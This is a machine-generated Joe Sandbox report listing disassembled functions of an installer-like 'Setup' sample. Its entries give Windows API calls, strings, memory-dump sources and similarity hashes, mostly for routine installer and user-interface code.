GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

Strings

user32.dll, xrefs: 0042E831
ChangeWindowMessageFilter, xrefs: 0042E82C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: ab1e53e41594daaa85a67824d287125c8d4b392dbafa799df7544d06f627293a
Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
Opcode Fuzzy Hash: ab1e53e41594daaa85a67824d287125c8d4b392dbafa799df7544d06f627293a
Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F

Function 004767B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?), ref: 004767B8
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,?,?,?,004768AF,0049B050,00000000), ref: 004767CB
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004767D1

Strings

AllowSetForegroundWindow, xrefs: 004767C1
user32.dll, xrefs: 004767C6

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: 1c48e9c9852dc1254230752567b5437a1e2cba1890d680d2ced78fc9e0b9fe21
Instruction ID: 6e27a2cfa281462b526e1be0b42828d7d17b2ea8f6af052b61cc0337a2e5f352
Opcode Fuzzy Hash: 1c48e9c9852dc1254230752567b5437a1e2cba1890d680d2ced78fc9e0b9fe21
Instruction Fuzzy Hash: BBD0A7B0201B0066DD1473F14D87D9B634ECD84799711883B7418E2186CA3CE808497D

Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00416C62
SaveDC.GDI32(?), ref: 00416C93
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
RestoreDC.GDI32(?,?), ref: 00416D1B
EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58

Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414846
MulDiv.KERNEL32(?,?,?), ref: 00414860
MulDiv.KERNEL32(?,?,?), ref: 00414889
MulDiv.KERNEL32(?,?,?), ref: 004148B4
MulDiv.KERNEL32(00000000,?,00000000), ref: 004148FC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19

Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C

Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
DeleteObject.GDI32(00000000), ref: 0041BCAA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MetricsSystem$A26310A570DeleteObject
String ID:
API String ID: 4277397052-0
Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98

Function 004726CC Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0045C86C: SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7

GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 00472759
GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 0047276F

Strings

Could not set permissions on the registry key because it currently does not exist., xrefs: 00472763
Setting permissions on registry key: %s\%s, xrefs: 0047271E
Failed to set permissions on registry key (%d)., xrefs: 00472780

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: 6fae09372c4fd606a9e7edd9372c643524b773ca1ba71cdea7820304e94b3b6f
Instruction ID: b8443cf5e2643b11ee943be54b693f5644c44bad37c33e6ad4d9b43925b6925c
Opcode Fuzzy Hash: 6fae09372c4fd606a9e7edd9372c643524b773ca1ba71cdea7820304e94b3b6f
Instruction Fuzzy Hash: 7021C870A042045FCB04DBAEDA817EEBBE4EF49314F50417BF408E7392C7B859058B69

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A122A18830$A480
String ID:
API String ID: 3325508737-0
Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765

Function 00481650 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(0001041A,?,00000000,00481965,?,?,00000001,?), ref: 00481761
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004817D6

Strings

, xrefs: 00481893
Need to restart Windows? %s, xrefs: 00481813

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
Instruction ID: 258ae82630cccce1ed416badf84f61652156c92a9ac7b4db40c87d24fe756750
Opcode Fuzzy Hash: 90a9701301ea6d6e270970a3c1a491c7c2ea0bab8356092fbe10affc47922363
Instruction Fuzzy Hash: 4C9192746002449FCB10FB69E986B9E77E5EF45308F1444BBE8109B372DB78A906CB5A

Function 0046EC24 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

GetLastError.KERNEL32(00000000,0046EE21,?,?,0049B178,00000000), ref: 0046ECFE
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046ED78
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046ED9D

Strings

Creating directory: %s, xrefs: 0046ECE6

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: c681436c6abe80054cabbe7a033e5a8d20c1909473b84fc5beeaf07f881fcade
Instruction ID: e286108a59dfd36e0898e5c3768873ff56d0638af642643f1fdc10795f0860a6
Opcode Fuzzy Hash: c681436c6abe80054cabbe7a033e5a8d20c1909473b84fc5beeaf07f881fcade
Instruction Fuzzy Hash: D0512274E00258ABDB01DFA6C582BDEB7F5AF49304F5085AAF800B7382D7795E04CB59

Function 00406FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD

Strings

Z, xrefs: 00407044

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 90da826c1d8458febfd188090b301e9900f2175c3eb38f271cd2116fbe9588a2
Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
Opcode Fuzzy Hash: 90da826c1d8458febfd188090b301e9900f2175c3eb38f271cd2116fbe9588a2
Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A

Function 0044C814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0044C8A2
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955

Strings

, xrefs: 0044C887

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: 7f52b274938ae0c7e24f2bc5de4b404ec72a3036d565b82a92ce2242a5cafbe0
Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
Opcode Fuzzy Hash: 7f52b274938ae0c7e24f2bc5de4b404ec72a3036d565b82a92ce2242a5cafbe0
Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64

Function 0042EDE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(?,00000000), ref: 0042EE35
73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14

Strings

...\, xrefs: 0042EEC6

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A480A570CreateFontIndirectObjectSelect
String ID: ...\
API String ID: 2998766281-983595016
Opcode ID: f81dbdf93088b627836addcdc7cf30af3d11f5edf595b4096ae4873c4ce467f7
Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
Opcode Fuzzy Hash: f81dbdf93088b627836addcdc7cf30af3d11f5edf595b4096ae4873c4ce467f7
Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69

Function 00454300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004543AE
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454474), ref: 00454418

Strings

sfc.dll, xrefs: 00454370
SfcIsFileProtected, xrefs: 004543A8

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: 23f51fe0479f8ae7d8a30082017171a3d232046e1fd555e3d520f687f991737e
Instruction ID: 02c15e4a31af94c42cf1f3a5d465fde73ea199283f03605d329b87cd975f2ee4
Opcode Fuzzy Hash: 23f51fe0479f8ae7d8a30082017171a3d232046e1fd555e3d520f687f991737e
Instruction Fuzzy Hash: B741A770A003189BEB10DB55DC85B9E77B8AB45309F5081B7E808A7293D7785F89CE5D

Function 00452F2C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B

Strings

(rI, xrefs: 00452FBD
.tmp, xrefs: 00452FCF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: (rI$.tmp
API String ID: 3498533004-3138636223
Opcode ID: dc7f74032bd1d44ca13ce0443e15644213f354a89f2c5f052ba9d2dac845bf3f
Instruction ID: 32dd1173b2630893fad950a4618aed64456021674ddb1d0776c2c96b8418077d
Opcode Fuzzy Hash: dc7f74032bd1d44ca13ce0443e15644213f354a89f2c5f052ba9d2dac845bf3f
Instruction Fuzzy Hash: E431C070A00219ABCB10EFA5D942B9EBBB5AF44745F20402BF800B72C2D6786F0587A9

Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
UnregisterClassA.USER32(?,00400000), ref: 004164BB
RegisterClassA.USER32(?), ref: 004164DE

Strings

@, xrefs: 00416439

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 46f879d651ca6580ea9d72e64a5dea8540cd89c5bc348625d91caab0477239a5
Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
Opcode Fuzzy Hash: 46f879d651ca6580ea9d72e64a5dea8540cd89c5bc348625d91caab0477239a5
Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A

Function 00453094 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530DA
GetLastError.KERNEL32(00000000,00000000,?,00000000,00453183,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530E3

Strings

(rI, xrefs: 00453129
.tmp, xrefs: 004530C3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: (rI$.tmp
API String ID: 1375471231-3138636223
Opcode ID: 1b4c193734db1ab49581b7c7b8351052156cbfe992effd549654dd58e058245b
Instruction ID: fdd405cf0ee7d7e8aaee19412d05bb9b19e2fd4e23256c5b47f735cbad2150ad
Opcode Fuzzy Hash: 1b4c193734db1ab49581b7c7b8351052156cbfe992effd549654dd58e058245b
Instruction Fuzzy Hash: C4211575A002089BDB01EFA5C8529DFB7B9EB48305F50457BE901B7382DA7C9F058BA9

Function 00451B80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

74D41520.VERSION(00000000,?,?,?,n_I), ref: 00451BA0
74D41500.VERSION(00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BCD
74D41540.VERSION(?,00451C44,?,?,00000000,?,00000000,?,00000000,00451C1B,?,00000000,?,?,?,n_I), ref: 00451BE7

Strings

n_I, xrefs: 00451B86
